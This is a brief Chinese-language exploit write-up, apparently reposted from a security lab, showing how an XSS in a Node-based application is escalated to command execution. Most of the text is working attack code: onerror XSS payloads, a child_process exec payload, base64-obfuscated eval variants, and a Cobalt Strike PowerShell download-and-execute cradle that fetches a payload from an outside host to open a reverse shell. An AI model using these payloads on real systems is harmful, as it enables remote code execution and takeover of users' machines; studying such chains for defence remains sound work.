文章来源: Khan安全攻防实验室
漏洞利用方式:
选择事件型XSS需要附带onerror事件,比如img、audio等。
弹窗代码:
<img src=x oneror=alert(1)>
构造命令执行payload
require('child_process').exec('ipconfig/all',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});
最终利用代码:
<img src=# onerror='eval(newBuffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>反弹shell命令
CS生成powershell脚本
powershell.exe -nop -w hidden -c "IEX((new-objectnet.webclient).downloadstring('http://127.0.0.1/test/'))"require('child_process').exec('powershell.exe-nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring(\'http://127.0.0.1/test\'))"',(error,stdout, stderr)=>{alert(`stdout: ${stdout}`);});cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguNzIuMTI5OjgwODEvYWJjZGVcJykpIicsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==<img src=# onerror='eval(newBuffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguNzIuMTI5OjgwODEvYWJjZGVcJykpIicsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())'>
推荐文章++++
*漏洞挖掘 | 一次XSS和CSRF的组合拳进攻 (CSRF+JSON)
*
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650510703&idx=3&sn=39ea51170fe592dc7fc5d023a439a234&chksm=83baf08bb4cd799d2352ed274f114bf2490025ddc201508d24596bf189096b13f018e35e17a6#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh